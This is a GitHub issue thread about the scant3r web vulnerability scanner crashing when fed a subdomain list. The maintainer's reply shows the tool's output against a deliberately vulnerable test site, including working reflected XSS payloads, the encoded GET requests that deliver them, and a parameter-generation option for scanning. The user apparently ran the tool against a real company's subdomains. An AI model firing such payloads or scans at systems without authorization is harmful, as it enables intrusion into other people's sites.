Skip to content
This repository has been archived by the owner on Apr 27, 2023. It is now read-only.

scant3r is not working #21

Closed
nithissh1 opened this issue Jun 3, 2021 · 1 comment
Closed

scant3r is not working #21

nithissh1 opened this issue Jun 3, 2021 · 1 comment
Labels
good first issue Good for newcomers

Comments

@nithissh1
Copy link

i had collected all the subdomains and pushed

cat zoho | ./scant3r.py -m

it crashed

cant able to run how to fix these issues

error
@knassar702
Copy link
Owner

hello @Nithissh0708 thanks for this issue , Most of scant3r models need parameters in the urls , for example

knassar702@DogePc:~/projects/scant3r$ cat list.txt | ./scant3r.py -m xss 

   ____              __  ____
  / __/______ ____  / /_|_  /____
 _\ \/ __/ _ `/ _ \/ __//_ </ __/
/___/\__/\_,_/_//_/\__/____/_/

[!] Coded by: Khaled Nassar @knassar702
[!] Version: 0.7#Beta

[+] XSS: http://testphp.vulnweb.com/listproducts.php
  Method: GET
  params: cat=1">ScanT3r<svg/onload=confirm(/ScanT3r/)>web"
  payload: ">ScanT3r<svg/onload=confirm(/ScanT3r/)>web"
---- Request ----

GET http://testphp.vulnweb.com/listproducts.php?cat=1%22%3EScanT3r%3Csvg/onload=confirm(/ScanT3r/)%3Eweb%22 HTTP/1.1
User-agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


--------

you can use -g option for add generate famous parameters to your URL

$ echo 'http://knassar702.github.io/' | ./scant3r.py -g

# https://knassar702.github.io/?q=&searchFor=&query=&Searchfor=goButton=&s=&search=&id=&keyword=&query=&page=&keywords=&url=&view=&cat=&name=&key=&p=&test=&artist=&user=&username=&group=


knassar702@DogePc:~/projects/scant3r$ echo 'http://testphp.vulnweb.com/listproducts.php' | ./scant3r.py -m xss -g
                          __ _____     
   ______________ _____  / /|__  /_____
  / ___/ ___/ __ `/ __ \/ __//_ </ ___/
 (__  ) /__/ /_/ / / / / /____/ / /    
/____/\___/\__,_/_/ /_/\__/____/_/ 

[!] Coded by: Khaled Nassar @knassar702
[!] Version: 0.7#Beta

[+] XSS: http://testphp.vulnweb.com/listproducts.php
  Method: GET
  params: q=&searchFor=&query=&Searchfor=goButton=&s=&search=&id=&keyword=&query=&page=&keywords=&url=&view=&cat="><img src=x OnMouseEnter=(confirm)(1)>ScanT3r&name=&key=&p=&test=&artist=&user=&username=&group=
  payload: "><img src=x OnMouseEnter=(confirm)(1)>ScanT3r
---- Request ----

GET http://testphp.vulnweb.com/listproducts.php?q=&searchFor=&query=&Searchfor=goButton=&s=&search=&id=&keyword=&query=&page=&keywords=&url=&view=&cat=%22%3E%3Cimg%20src=x%20OnMouseEnter=(confirm)(1)%3EScanT3r&name=&key=&p=&test=&artist=&user=&username=&group= HTTP/1.1
User-agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


--------

if you think scant3r doesn't work for another reason , feel free for reopen this issue

best regards
@knassar702

@knassar702 knassar702 added the good first issue Good for newcomers label Jun 3, 2021
@knassar702 knassar702 pinned this issue Jun 3, 2021
@knassar702 knassar702 unpinned this issue Aug 7, 2021
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
good first issue Good for newcomers
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@knassar702 @nithissh1